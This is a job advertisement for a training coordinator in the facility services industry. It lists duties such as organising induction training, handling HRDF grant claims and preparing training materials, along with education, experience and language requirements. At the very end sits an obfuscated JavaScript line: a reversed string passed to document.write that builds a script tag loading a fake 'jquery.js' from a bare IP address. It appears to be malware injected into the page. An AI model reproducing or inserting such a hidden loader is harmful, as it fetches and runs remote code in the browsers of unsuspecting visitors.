Industry : Facility Services
– To coordinate induction training for new local employee, foreigner worker .
– Develop new training methods and training schedules.
– To coordinate all training arrangement including travel arrangement, accommodation and etc.;
– To liaise with HRDF regarding application of training grant and claim matter;
– To liaise with training consultant for sourcing new training courses;
– To assist in developing annual training plan and budget;
– To prepare training aids such as power point slides, manual, handbooks and etc.;
– To undertake ad-hoc assignment related to training as required by superior.
– Must be familiar with cleaning service industry training.
– Candidate must possess at least a Professional Certificate, Diploma, Bachelor’s Degree, Professional Degree, Human Resource Management / Development or equivalent;
– Minimum 2 years of related working experience;
– Familiar with HRDF claim and submission of document;
– Good coordination and execution skills;
– Ability to work on broad range of assignments with minimum supervision.
– Willingness to travel and must process own transportation.
– Intermediate knowledge and use of Word, Power Point, Excel.
– Able to communicate and write in English and Bahasa Melayu. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))